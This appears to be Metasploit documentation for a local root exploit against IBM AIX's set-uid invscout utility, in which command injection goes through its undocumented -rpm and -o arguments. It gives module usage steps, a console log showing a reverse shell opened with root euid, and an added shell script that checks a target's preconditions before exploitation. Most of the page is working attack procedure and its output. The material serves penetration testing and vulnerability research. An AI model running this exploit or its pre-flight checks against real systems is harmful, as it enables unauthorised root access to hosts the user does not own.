## Vulnerable Application

This module exploits a command injection vulnerability in the IBM AIX
`invscout` set-uid root utility present in AIX 7.2 and earlier.

The undocumented `-rpm` argument can be used to install an RPM file, and
the undocumented `-o` argument passes additional arguments to the `rpm`
utility without validation, leading to command injection. Because
`invscout` is set-uid root, the injected command runs with an effective
uid of 0; the real uid remains that of the invoking user, as the `id`
output in the scenario below shows.

This module has been tested successfully on AIX 7.2.
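The module relies on two preconditions stated above: the `invscout` binary must be set-uid root, and the host must be on AIX 7.2 or earlier. The following POSIX `sh` script is an added example for confirming both from an existing low-privilege shell before running the module; it is not part of the Metasploit module or its documentation. It assumes the module's default binary path (overridable through the `INVSCOUT_PATH` environment variable here, mirroring the module option of the same name), parses `ls -ld` output rather than GNU `stat` because AIX lacks the latter, and reads the version/release pair from `uname -v` / `uname -r` (the `2 7` fields visible in the `uname -a` output below). The sample `ls -ld` line in the comments is constructed for illustration.

```shell
#!/bin/sh
# Added example, not the Metasploit module's own code: pre-flight checks for the
# invscout preconditions. Save as invscout_preflight.sh and run with --run on the target.

# Assumption: same default path as the module's INVSCOUT_PATH option.
INVSCOUT_PATH="${INVSCOUT_PATH:-/usr/sbin/invscout}"

# is_setuid_root LS_LINE
# Takes one line of 'ls -ld <file>' output, e.g. (constructed sample)
#   -r-sr-xr-x    1 root     system        214388 Jun 23 2020 /usr/sbin/invscout
# and returns 0 when the owner-execute slot of the mode string carries the
# set-uid bit ('s', or 'S' when the execute bit is absent) and the owner is root.
is_setuid_root() {
    set -- $1                    # split the ls line into whitespace-separated fields
    mode=$1
    owner=$3
    case "$mode" in
        ???s*|???S*) ;;          # 4th character is the owner-execute position
        *) return 1 ;;
    esac
    [ "$owner" = "root" ]
}

# aix_level_affected VERSION RELEASE
# Returns 0 when VERSION.RELEASE (the values of 'uname -v' and 'uname -r')
# is 7.2 or earlier, the range this page lists as affected.
aix_level_affected() {
    ver=$1
    rel=$2
    [ "$ver" -lt 7 ] && return 0
    [ "$ver" -eq 7 ] && [ "$rel" -le 2 ] && return 0
    return 1
}

# preflight
# Runs both checks against the live host and prints a verdict; returns 0 only
# when the binary is present, set-uid root, and the AIX level is in range.
preflight() {
    if [ ! -f "$INVSCOUT_PATH" ]; then
        echo "[-] $INVSCOUT_PATH not found; set INVSCOUT_PATH to the correct path"
        return 1
    fi
    if ! is_setuid_root "$(ls -ld "$INVSCOUT_PATH")"; then
        echo "[-] $INVSCOUT_PATH is not set-uid root; the module cannot gain euid 0 through it"
        return 1
    fi
    level="$(uname -v).$(uname -r)"
    if ! aix_level_affected "$(uname -v)" "$(uname -r)"; then
        echo "[*] AIX $level is outside the stated affected range (7.2 and earlier)"
        return 1
    fi
    echo "[+] $INVSCOUT_PATH is set-uid root on AIX $level; preconditions for the module hold"
    return 0
}

# Only touch the live system when explicitly asked, so the file stays sourceable.
if [ "${1:-}" = "--run" ]; then
    preflight
fi
```

Running `sh invscout_preflight.sh --run` from the low-privilege session prints one of the three verdict lines; the version gate is deliberately advisory, since the page only documents testing on 7.2, and a mismatch there is a reason to double-check the module's own `AutoCheck` output rather than to skip it.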

## Verification Steps

1. `msfconsole`
1. Get a session
1. `use exploit/aix/local/invscout_rpm_priv_esc`
1. `set session <session>`
1. `run`

## Options

### INVSCOUT_PATH

Path to the `invscout` executable (default: `/usr/sbin/invscout`).

## Scenarios

### IBM AIX 7.2

```
msf6 > use exploit/aix/local/invscout_rpm_priv_esc
msf6 exploit(aix/local/invscout_rpm_priv_esc) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(aix/local/invscout_rpm_priv_esc) > set session 1
session => 1
msf6 exploit(aix/local/invscout_rpm_priv_esc) > run

[*] Started reverse TCP double handler on 192.168.200.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Output: uid=204(user) gid=1(staff) euid=0(root)
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 9BZSm5LKtW9OMKHg;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "9BZSm5LKtW9OMKHg\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (192.168.200.130:4444 -> 192.168.200.204:49036) at 2023-05-13 18:29:23 -0400

id
uid=204(user) gid=1(staff) euid=0(root)
uname -a
AIX localhost 2 7 000000000000
```
